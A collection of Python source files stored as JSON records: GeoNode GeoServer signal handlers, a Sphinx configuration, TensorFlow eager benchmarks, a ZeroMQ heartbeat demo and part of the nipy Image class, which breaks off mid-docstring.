geonode.services.enumerations import CASCADED\n\nfrom . import BACKEND_PACKAGE\nfrom .tasks import geoserver_cascading_delete, geoserver_post_save_layers\n\nlogger = logging.getLogger(\"geonode.geoserver.signals\")\n\ngeoserver_post_save_complete = Signal(providing_args=['instance'])\n\n\ndef geoserver_delete(typename):\n # cascading_delete should only be called if\n # ogc_server_settings.BACKEND_WRITE_ENABLED == True\n if getattr(ogc_server_settings, \"BACKEND_WRITE_ENABLED\", True):\n geoserver_cascading_delete.apply_async((typename,))\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_pre_delete(instance, sender, **kwargs):\n \"\"\"Removes the layer from GeoServer\n \"\"\"\n # cascading_delete should only be called if\n # ogc_server_settings.BACKEND_WRITE_ENABLED == True\n if getattr(ogc_server_settings, \"BACKEND_WRITE_ENABLED\", True):\n if instance.remote_service is None or instance.remote_service.method == CASCADED:\n if instance.alternate:\n geoserver_cascading_delete.apply_async((instance.alternate,))\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_pre_save(*args, **kwargs):\n # nothing to do here, processing is pushed to post-save\n pass\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_post_save(instance, sender, created, **kwargs):\n from geonode.messaging import producer\n # this is attached to various models, (ResourceBase, Document)\n # so we should select what will be handled here\n if isinstance(instance, Layer):\n instance_dict = model_to_dict(instance)\n payload = json_serializer_producer(instance_dict)\n try:\n producer.geoserver_upload_layer(payload)\n except Exception as e:\n logger.error(e)\n if getattr(settings, 'DELAYED_SECURITY_SIGNALS', False):\n instance.set_dirty_state()\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_post_save_local(instance, *args, **kwargs):\n \"\"\"Send information to geoserver.\n\n The attributes sent include:\n\n * Title\n * Abstract\n * Name\n * Keywords\n * Metadata Links,\n * Point of Contact name and url\n \"\"\"\n geoserver_post_save_layers.apply_async(\n (instance.id, args, kwargs))\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_pre_save_maplayer(instance, sender, **kwargs):\n # If this object was saved via fixtures,\n # do not do post processing.\n if kwargs.get('raw', False):\n return\n\n try:\n instance.local = isinstance(\n gs_catalog.get_layer(\n instance.name),\n GsLayer)\n except EnvironmentError as e:\n if e.errno == errno.ECONNREFUSED:\n msg = f'Could not connect to catalog to verify if layer {instance.name} was local'\n logger.warn(msg)\n else:\n raise e\n\n\n@on_ogc_backend(BACKEND_PACKAGE)\ndef geoserver_post_save_map(instance, sender, created, **kwargs):\n instance.set_missing_info()\n if not created:\n if not instance.thumbnail_url or \\\n instance.thumbnail_url == staticfiles.static(settings.MISSING_THUMBNAIL):\n logger.debug(f\"... Creating Thumbnail for Map [{instance.title}]\")\n # create_gs_thumbnail(instance, overwrite=False, check_bbox=True)\n geoserver_create_thumbnail.apply_async(((instance.id, False, True, )))\n\n\n@receiver(geoserver_post_save_complete)\ndef geoserver_post_save_thumbnail(sender, instance, **kwargs):\n # Creating Layer Thumbnail\n # some thumbnail generators will update thumbnail_url. If so, don't\n # immediately re-generate the thumbnail here. use layer#save(update_fields=['thumbnail_url'])\n try:\n instance.refresh_from_db()\n logger.debug(f\"... Creating Thumbnail for Layer {instance.title}\")\n _recreate_thumbnail = False\n if 'update_fields' in kwargs and kwargs['update_fields'] is not None and \\\n 'thumbnail_url' in kwargs['update_fields']:\n _recreate_thumbnail = True\n if not instance.thumbnail_url or \\\n instance.thumbnail_url == staticfiles.static(settings.MISSING_THUMBNAIL) or \\\n is_monochromatic_image(instance.thumbnail_url):\n _recreate_thumbnail = True\n if _recreate_thumbnail:\n geoserver_create_thumbnail.apply_async(((instance.id, False, True, )))\n else:\n logger.debug(f\"... Thumbnail for Layer {instance.title} already exists: {instance.thumbnail_url}\")\n except Exception as e:\n logger.exception(e)\n"} {"ext": "py", "sha": "1a2f982e46600735ad81eb22afcab7796311f9c0", "content": "# -*- coding: utf-8 -*-\n#\n# dist_fit documentation build configuration file, created by\n# sphinx-quickstart on Sat Nov 10 11:16:37 2012.\n#\n# This file is execfile()d with the current directory set to its containing dir.\n#\n# Note that not all possible configuration values are present in this\n# autogenerated file.\n#\n# All configuration values have a default; values that are commented out\n# serve to show the default.\nimport matplotlib\nmatplotlib.use('Agg')\nimport sys\nfrom os.path import dirname, join\n\nsys.path.insert(0, join(dirname(__file__), '../'))\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#sys.path.insert(0, os.path.abspath('.'))\n\n# -- General configuration -----------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\n#needs_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['matplotlib.sphinxext.only_directives',\n 'matplotlib.sphinxext.plot_directive',\n 'matplotlib.sphinxext.ipython_directive',\n 'sphinx.ext.autodoc',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.autosummary']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'probfit'\ncopyright = u'2012, Piti Ongmongkolkul'\nautoclass_content = 'both'\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nimport probfit.info\nversion = probfit.info.__version__\n# The full version, including alpha/beta/rc tags.\nrelease = probfit.info.__version__\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#language = None\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n#today = ''\n# Else, today_fmt is used as the format for a strftime call.\n#today_fmt = '%B %d, %Y'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build', '_themes']\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'armstrong'\n\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#html_theme_options = {}\n\n# Add any paths that contain custom themes here, relative to this directory.\nhtml_theme_path = ['_themes', ]\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\n#html_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n#html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\n#html_show_sphinx = True\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\n#html_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'probfitdoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n# The paper size ('letterpaper' or 'a4paper').\n#'papersize': 'letterpaper',\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n\n# Additional stuff for the LaTeX preamble.\n#'preamble': '',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [\n ('index', 'probfit.tex', u'dist\\\\_fit Documentation',\n u'Piti Ongmongkolkul', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'probfit', u'probfit Documentation',\n [u'Piti Ongmongkolkul'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n ('index', 'probfit', u'probfit Documentation',\n u'Piti Ongmongkolkul', 'probfit', 'Fitting Stuff',\n 'Miscellaneous'),\n]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n"} {"ext": "py", "sha": "1a2f998340ee16e43ab660980c196eaa7a6ef5de", "content": "\"\"\"\n\"Beacon\" (c) by Ignacio Slater M.\n\"Beacon\" is licensed under a\nCreative Commons Attribution 4.0 International License.\nYou should have received a copy of the license along with this\nwork. If not, see .\n\"\"\""} {"ext": "py", "sha": "1a2f99fe9e7de73aadee46f02c068cf4dc5697ed", "content": "# Copyright 2017 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Benchmarks for low-level eager execution primitives.\n\nPackaged as a test to ensure that this code is exercised by continuous\nintegration tests. To get numbers:\n\n bazel build -c opt :benchmarks_test &&\n ./bazel-bin/tensorflow/python/eager/benchmarks_test --iters=0\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport contextlib\nimport sys\nimport time\n\nimport numpy as np\nfrom six.moves import xrange # pylint: disable=redefined-builtin\n\nfrom tensorflow.python import pywrap_tensorflow\nfrom tensorflow.python.eager import backprop # pylint: disable=unused-import\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.eager import function\nfrom tensorflow.python.eager import test\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import gen_math_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import random_ops\n\nFLAGS = None\n\n\n@contextlib.contextmanager\ndef timer(label, iters=30000):\n start = time.time()\n yield xrange(iters)\n end = time.time()\n t = (end - start) * 1e6 / iters\n print(\"%-40s took %.2fus (%d iterations)\" % (label, t, iters))\n\n\ndef benchmark_create_tensor(n):\n \"\"\"Benchmark overheads of creating a Tensor object.\"\"\"\n\n def label(s):\n return \"{:20s}\".format(s)\n\n with timer(label(\"np.array([[3.0]])\"), iters=n) as iters:\n for _ in iters:\n np.array([[3.0]])\n\n ctx = context.context()\n handle = ctx._handle\n device = ctx.device_name\n # May be warmup GPU.\n ops.EagerTensor([[3.0]], context=handle, device=device)\n\n # float32\n dtype = dtypes.float32.as_datatype_enum\n three = [[3.0]]\n with timer(label(\"EagerTensor([[3.0]])\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(three, context=handle, device=device, dtype=dtype)\n\n np_3 = np.array([[3.0]], dtype=np.float32)\n with timer(label(\"EagerTensor(np.array([[3.0]]))\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(np_3, context=handle, device=device, dtype=dtype)\n\n # int32.\n # This is interesting since int32 will be kept on host memory for the GPU\n # case.\n dtype = dtypes.int32.as_datatype_enum\n three = [[3]]\n with timer(label(\"EagerTensor([[3]])\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(three, context=handle, device=device, dtype=dtype)\n\n np_3 = np.array([[3]], dtype=np.int32)\n with timer(label(\"EagerTensor(np.array([[3]]))\"), iters=n) as iters:\n for _ in iters:\n ops.EagerTensor(np_3, context=handle, device=device, dtype=dtype)\n\n\ndef benchmark_matmul(shape, n, use_gpu=False):\n \"\"\"Benchmark for matrix multiplication using tf.matmul.\"\"\"\n transpose_b = (shape[0] != shape[1])\n m = random_ops.random_uniform(shape)\n if use_gpu:\n m = m.gpu()\n # Warm up the GPU - the very first kernel invocation\n # seems to require a bunch of setup.\n math_ops.matmul(m, m, transpose_b=transpose_b)\n\n def label(s):\n return \"MatMul {}: {:30s}\".format(shape, s)\n\n if not use_gpu:\n a = m.cpu().numpy()\n b = a.T if transpose_b else a\n with timer(label(\"np.dot\"), iters=n) as iters:\n for _ in iters:\n np.dot(a, b)\n\n with timer(label(\"tf.matmul\"), iters=n) as iters:\n for _ in iters:\n math_ops.matmul(m, m, transpose_b=transpose_b)\n\n with timer(label(\"gen_math_ops.mat_mul\"), iters=n) as iters:\n for _ in iters:\n gen_math_ops._mat_mul(m, m, transpose_b=transpose_b)\n\n inputs = [m, m]\n # pylint: disable=protected-access\n ctx_handle = context.context()._handle\n # pylint: enable=protected-access\n attrs = (\"transpose_a\", False, \"transpose_b\", transpose_b, \"T\",\n m.dtype.as_datatype_enum)\n with timer(label(\"TFE_Py_Execute\"), iters=n) as iters:\n for _ in iters:\n pywrap_tensorflow.TFE_Py_Execute(ctx_handle, None, \"MatMul\",\n inputs, attrs, 1)\n\n f = function.defun(math_ops.matmul)\n with timer(label(\"defun(tf.matmul)\"), iters=n) as iters:\n for _ in iters:\n f(m, m, transpose_b=transpose_b)\n\n\ndef benchmark_multiply(shape, n, use_gpu=False):\n m = random_ops.random_uniform(shape)\n if use_gpu:\n m = m.gpu()\n # Warm up the GPU - the very first kernel invocation\n # seems to require a bunch of setup.\n _ = m * m\n\n def label(s):\n return \"Multiply {}: {:30s}\".format(shape, s)\n\n if not use_gpu:\n a = m.cpu().numpy()\n with timer(label(\"np.multiply\"), iters=n) as iters:\n for _ in iters:\n _ = a * a\n\n with timer(label(\"tf.multiply\"), iters=n) as iters:\n for _ in iters:\n _ = m * m\n\n\nclass BenchmarksTest(test_util.TensorFlowTestCase):\n\n def testBenchmarks(self):\n # This isn't actually a test, but benchmarks packaged as a test\n # so that continuous integration runs catch any breakages.\n print(context.context())\n benchmark_create_tensor(FLAGS.iters or 30000)\n benchmark_matmul([2, 2], FLAGS.iters or 30000)\n benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000)\n benchmark_multiply([2], FLAGS.iters or 30000)\n\n if context.context().num_gpus() > 0:\n print(\"---- RUNNING ON GPU NOW ----\")\n with context.device(\"/device:GPU:0\"):\n benchmark_create_tensor(FLAGS.iters or 30000)\n benchmark_matmul([2, 2], FLAGS.iters or 30000, use_gpu=True)\n benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000, use_gpu=True)\n benchmark_multiply([2], FLAGS.iters or 30000, use_gpu=True)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n # Default iterations to 1 to keep continuos integration test times low.\n parser.add_argument(\n \"--iters\",\n type=int,\n default=1,\n help=\"Number of iterators for each test. None or 0 for auto-selection\")\n FLAGS, unparsed = parser.parse_known_args()\n sys.argv = [sys.argv[0]] + unparsed\n test.main()\n"} {"ext": "py", "sha": "1a2f9caa414793b1785cf0cee2e5c50908fe5161", "content": "# -*- coding: utf-8 -*-\r\nimport os\r\n\r\nimport interface.session_events as se\r\n\r\n################################################################################\r\ndef use_GUI_windows(vip):\r\n \"\"\"Let the windows pop up that contain all the vip widgets.\r\n \"\"\"\r\n message_cwd = \"Current working directory:\\n{0}\\n\".format(os.getcwd())\r\n message_welcome = \"Welcome to the Virtual Instrument Panel!\\n\"\r\n vip.GUI_feedback([message_cwd, message_welcome])\r\n\r\n se.bn_open_GUI_feedback(vip)\r\n se.bn_open_plots_12(vip)\r\n\r\n vip.show()\r\n\r\n print \"\\n/(use_GUI_windows)\\n\"\r\n\r\ndef customize_paths(vip, DIR_PATH_data):\r\n \"\"\"Use the vip's .set method to set the path relevant to the user interface.\r\n \"\"\"\r\n ### this sets several line edits to initial sensible values\r\n FILE_PATH_session = DIR_PATH_data+os.sep+\"session_init.txt\"\r\n FILE_PATH_notes = \"K:\\\\_Computing\\\\MeasurementSoftware\\\\VIP_notes.txt\"\r\n FILE_PATH_waveform = \"C:/Users/Public/Documents/Signadyne/Examples/Waveforms/Gaussian.csv\"\r\n\r\n ### The format is: vip.set(SESSION_KEY, REPLACEMENT_DICTIONARY)\r\n ### Note that we could also save those settings to a .txt file and load it.\r\n vip.set('Results', {'DIR_PATH_results' : DIR_PATH_data})\r\n vip.set('Session', {'FILE_PATH_session' : FILE_PATH_session})\r\n vip.set('Options', {'FILE_PATH_notes' : FILE_PATH_notes})\r\n vip.set('H3344_1', {'FILE_PATH_waveform' : FILE_PATH_waveform})\r\n\r\n for index in vip._sessions_local.keys():\r\n vip.set('Session', {'F_dict_index' : str(index)}) # why is this not setting the index??/\r\n se.bn_vip_to_list_session(vip)\r\n\r\n vip.set('Session', {'F_dict_index' : 'default'})\r\n\r\n ### Unless it already exists, create a results data file directory.\r\n if not os.path.isdir(DIR_PATH_data):\r\n os.makedirs(DIR_PATH_data)\r\n ###Finally, make the Data folder the working directory for our session.\r\n os.chdir(DIR_PATH_data)\r\n\r\n print \"\\n/(customize_DIR_and_FILE_paths)\\n\"\r\n"} {"ext": "py", "sha": "1a2f9eaa432ecda298d5d7d079f83268aba0a32a", "content": "from time import sleep\nfrom threading import Event, Thread\n\nfrom zmq import (\n Context,\n HWM,\n NOBLOCK,\n Poller,\n POLLIN,\n PUB,\n PAIR,\n SUB,\n SUBSCRIBE,\n )\n\nshutdown = Event()\n\n\nclass KillThread(Exception):\n \"\"\"Raised when we want threads to die\"\"\"\n\n\nclass Heartbeat(Thread):\n\n def __init__(self, context, *args, **kw):\n self.context = context\n self.pub = self.context.socket(PAIR)\n self.pub.bind(\"inproc://#1\")\n super(Heartbeat, self).__init__(*args, **kw)\n\n def cleanup(self):\n self.pub.send(\"DIE\")\n self.pub.close()\n\n def run(self):\n try:\n x = 0\n while not shutdown.is_set():\n self.pub.send(\"BEAT.FOO.* %d, %s\" % (x + 1, self.name))\n x += 1\n sleep(1)\n finally:\n print \"%s exiting...\" % self.name\n self.cleanup()\n\n\nclass Stethoscope(Thread):\n\n def __init__(self, context, *args, **kw):\n self.context = context\n self.recv = self.context.socket(PAIR)\n self.recv.connect(\"inproc://#1\")\n\n self.pub = self.context.socket(PUB)\n self.pub.connect('tcp://localhost:7003')\n self.pub.setsockopt(HWM, 1000)\n\n self.poller = Poller()\n self.poller.register(self.recv, POLLIN)\n super(Stethoscope, self).__init__(*args, **kw)\n\n def cleanup(self):\n self.recv.close()\n self.pub.close()\n\n def run(self):\n try:\n while not shutdown.is_set():\n socks = dict(self.poller.poll())\n if socks.get(self.recv) == POLLIN:\n msg = self.recv.recv()\n self.pub.send(msg, flags=NOBLOCK)\n if msg == \"DIE\":\n raise KillThread\n except KillThread:\n print \"%s exiting...\" % self.name\n finally:\n self.cleanup()\n\ncontext = Context()\n\nheart = Heartbeat(context, name=\"Heartbeat Thread\")\nstethoscope = Stethoscope(context, name=\"Stethoscope Thread\")\n\n\nfor t in (heart, stethoscope):\n t.start()\n\nwhile True:\n try:\n # call thread.join to keep some control in the main thread\n while (heart.is_alive() or\n stethoscope.is_alive()):\n heart.join(timeout=0.1)\n stethoscope.join(timeout=0.1)\n\n except KeyboardInterrupt:\n shutdown.set()\n while (heart.is_alive() or\n stethoscope.is_alive()):\n heart.join(timeout=0.1)\n stethoscope.join(timeout=0.1)\n\n context.term()\n break\n"} {"ext": "py", "sha": "1a2f9f9a333372189788bbe40fb4fda6f65e8a24", "content": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\" Define the Image class and functions to work with Image instances\n\n* fromarray : create an Image instance from an ndarray (deprecated in favor of\n using the Image constructor)\n* subsample : slice an Image instance (deprecated in favor of image slicing)\n* rollaxis : roll an image axis backwards\n* synchronized_order : match coordinate systems between images\n* iter_axis : make iterator to iterate over an image axis\n* is_image : test for an object obeying the Image API\n\"\"\"\nimport warnings\nfrom copy import copy\n\nimport numpy as np\n\nfrom nibabel.onetime import setattr_on_read\n\n# These imports are used in the fromarray and subsample functions only, not in\n# Image\nfrom ..reference.coordinate_map import (AffineTransform, CoordinateSystem,\n input_axis_index)\nfrom ..reference.array_coords import ArrayCoordMap\n\n\nclass Image(object):\n \"\"\" The `Image` class provides the core object type used in nipy.\n\n An `Image` represents a volumetric brain image and provides means\n for manipulating the image data. Most functions in the image module\n operate on `Image` objects.\n\n Notes\n -----\n Images can be created through the module functions. See nipy.io for\n image IO such as ``load`` and ``save``\n\n Examples\n --------\n Load an image from disk\n\n >>> from nipy.testing import anatfile\n >>> from nipy.io.api import load_image\n >>> img = load_image(anatfile)\n\n Make an image from an array. We need to make a meaningful coordinate map\n for the image.\n\n >>> arr = np.zeros((21,64,64), dtype=np.int16)\n >>> cmap = AffineTransform('kji', 'zxy', np.eye(4))\n >>> img = Image(arr, cmap)\n \"\"\"\n _doc = {}\n\n # Dictionary to store docs for attributes that are properties. We\n # want these docs to conform with our documentation standard, but\n # they need to be passed into the property function. Defining\n # them separately allows us to do this without a lot of clutter\n # in the property line.\n\n ###################################################################\n #\n # Attributes\n #\n ###################################################################\n\n metadata = {}\n _doc['metadata'] = \"Dictionary containing additional information.\"\n\n coordmap = AffineTransform(CoordinateSystem('ijk'),\n CoordinateSystem('xyz'),\n np.diag([3,5,7,1]))\n _doc['coordmap'] = \"Affine transform mapping from axes coordinates to reference coordinates.\"\n\n @setattr_on_read\n def shape(self):\n return self._data.shape\n _doc['shape'] = \"Shape of data array.\"\n\n @setattr_on_read\n def ndim(self):\n return len(self._data.shape)\n _doc['ndim'] = \"Number of data dimensions.\"\n\n @setattr_on_read\n def reference(self):\n return self.coordmap.function_range\n _doc['reference'] = \"Reference coordinate system.\"\n\n @setattr_on_read\n def axes(self):\n return self.coordmap.function_domain\n _doc['axes'] = \"Axes of image.\"\n\n @setattr_on_read\n def affine(self):\n if hasattr(self.coordmap, \"affine\"):\n return self.coordmap.affine\n raise AttributeError, 'Nonlinear transform does not have an affine.'\n _doc['affine'] = \"Affine transformation if one exists.\"\n\n ###################################################################\n #\n # Properties\n #\n ###################################################################\n\n def _getheader(self):\n # data loaded from a file may have a header\n warnings.warn(\"Please don't use ``img.header``; use\"\n \"``img.metadata['header'] instead\",\n DeprecationWarning,\n stacklevel=2)\n hdr = self.metadata.get('header')\n if hdr is None:\n raise AttributeError('Image created from arrays '\n 'may not have headers.')\n return hdr\n def _setheader(self, header):\n warnings.warn(\"Please don't use ``img.header``; use\"\n \"``img.metadata['header'] instead\",\n DeprecationWarning,\n stacklevel=2)\n self.metadata['header'] = header\n _doc['header'] = \\\n \"\"\"The file header structure for this image, if available. This interface\n will soon go away - you should use ``img.metadata['header'] instead.\n \"\"\"\n header = property(_getheader, _setheader, doc=_doc['header'])\n\n ###################################################################\n #\n # Constructor\n #\n ###################################################################\n\n def __init__(self, data, coordmap, metadata=None):\n \"\"\"Create an `Image` object from array and `CoordinateMap` object.\n\n Images are often created through the ``load_image`` function in the nipy\n base namespace.\n\n Parameters\n ----------\n data : array-like\n object that as attribute ``shape`` and returns an array from\n ``np.asarray(data)``\n coordmap : `AffineTransform` object\n coordmap mapping the domain (input) voxel axes of the image to the\n range (reference, output) axes - usually mm in real world space\n metadata : dict, optional\n Freeform metadata for image. Most common contents is ``header``\n from nifti etc loaded images.\n\n See Also\n --------\n load_image : load ``Image`` from a file\n save_image : save ``Image`` to a file\n \"\"\"\n if metadata is None:\n metadata = {}\n else: # Shallow copy\n metadata = copy(metadata)\n ndim = len(data.shape)\n if not isinstance(coordmap, AffineTransform):\n raise ValueError('coordmap must be an AffineTransform')\n # self._data is an array-like object. It must have a shape attribute\n # (see above) and return an array from np.array(data)\n self._data = data\n self.coordmap = coordmap\n if coordmap.function_domain.ndim != ndim:\n raise ValueError('the number of axes implied by the coordmap do '\n 'not match the number of axes of the data')\n self.metadata = metadata\n\n ###################################################################\n #\n # Methods\n #\n ###################################################################\n\n def reordered_reference(self, order=None):\n \"\"\" Return new Image with reordered output coordinates\n\n New Image coordmap has reordered output coordinates. This does\n not transpose the data.\n\n Parameters\n ----------\n order : None, sequence, optional\n sequence of int (giving indices) or str (giving names) - expressing\n new order of coordmap output coordinates. None (the default)\n results in reversed ordering.\n\n Returns\n -------\n r_img : object\n Image of same class as `self`, with reordered output coordinates.\n\n Examples\n --------\n >>> cmap = AffineTransform.from_start_step(\n ... 'ijk', 'xyz', [1, 2, 3], [4, 5, 6], 'domain', 'range')\n >>> im = Image(np.empty((30,40,50)), cmap)\n >>> im_reordered = im.reordered_reference([2,0,1])\n >>> im_reordered.shape\n (30, 40, 50)\n >>> im_reordered.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k'), name='domain', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('z', 'x', 'y'), name='range', coord_dtype=float64),\n affine=array([[ 0., 0., 6., 3.],\n [ 4., 0., 0., 1.],\n [ 0., 5., 0., 2.],\n [ 0., 0., 0., 1.]])\n )\n \"\"\"\n if order is None:\n order = range(self.ndim)[::-1]\n elif type(order[0]) == type(''):\n order = [self.reference.index(s) for s in order]\n new_cmap = self.coordmap.reordered_range(order)\n return self.__class__.from_image(self, coordmap=new_cmap)\n\n def reordered_axes(self, order=None):\n \"\"\" Return a new Image with reordered input coordinates.\n\n This transposes the data as well.\n\n Parameters\n ----------\n order : None, sequence, optional\n Sequence of int (giving indices) or str (giving names) - expressing\n new order of coordmap output coordinates. None (the default)\n results in reversed ordering.\n\n Returns\n -------\n r_img : object\n Image of same class as `self`, with reordered output coordinates.\n\n Examples\n --------\n >>> cmap = AffineTransform.from_start_step(\n ... 'ijk', 'xyz', [1, 2, 3], [4, 5, 6], 'domain', 'range')\n >>> cmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k'), name='domain', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z'), name='range', coord_dtype=float64),\n affine=array([[ 4., 0., 0., 1.],\n [ 0., 5., 0., 2.],\n [ 0., 0., 6., 3.],\n [ 0., 0., 0., 1.]])\n )\n >>> im = Image(np.empty((30,40,50)), cmap)\n >>> im_reordered = im.reordered_axes([2,0,1])\n >>> im_reordered.shape\n (50, 30, 40)\n >>> im_reordered.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('k', 'i', 'j'), name='domain', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z'), name='range', coord_dtype=float64),\n affine=array([[ 0., 4., 0., 1.],\n [ 0., 0., 5., 2.],\n [ 6., 0., 0., 3.],\n [ 0., 0., 0., 1.]])\n )\n \"\"\"\n if order is None:\n order = range(self.ndim)[::-1]\n elif type(order[0]) == type(''):\n order = [self.axes.index(s) for s in order]\n new_cmap = self.coordmap.reordered_domain(order)\n # Only transpose if we have to so as to avoid calling\n # self.get_data\n if order != range(self.ndim):\n new_data = np.transpose(self.get_data(), order)\n else:\n new_data = self._data\n return self.__class__.from_image(self,\n data=new_data,\n coordmap=new_cmap)\n\n def renamed_axes(self, **names_dict):\n \"\"\" Return a new image with input (domain) axes renamed\n\n Axes renamed according to the input dictionary.\n\n Parameters\n ----------\n \\*\\*names_dict : dict\n with keys being old names, and values being new names\n\n Returns\n -------\n newimg : Image\n An Image with the same data, having its axes renamed.\n\n Examples\n --------\n >>> data = np.random.standard_normal((11,9,4))\n >>> im = Image(data, AffineTransform.from_params('ijk', 'xyz', np.identity(4), 'domain', 'range'))\n >>> im_renamed = im.renamed_axes(i='slice')\n >>> print im_renamed.axes\n CoordinateSystem(coord_names=('slice', 'j', 'k'), name='domain', coord_dtype=float64)\n 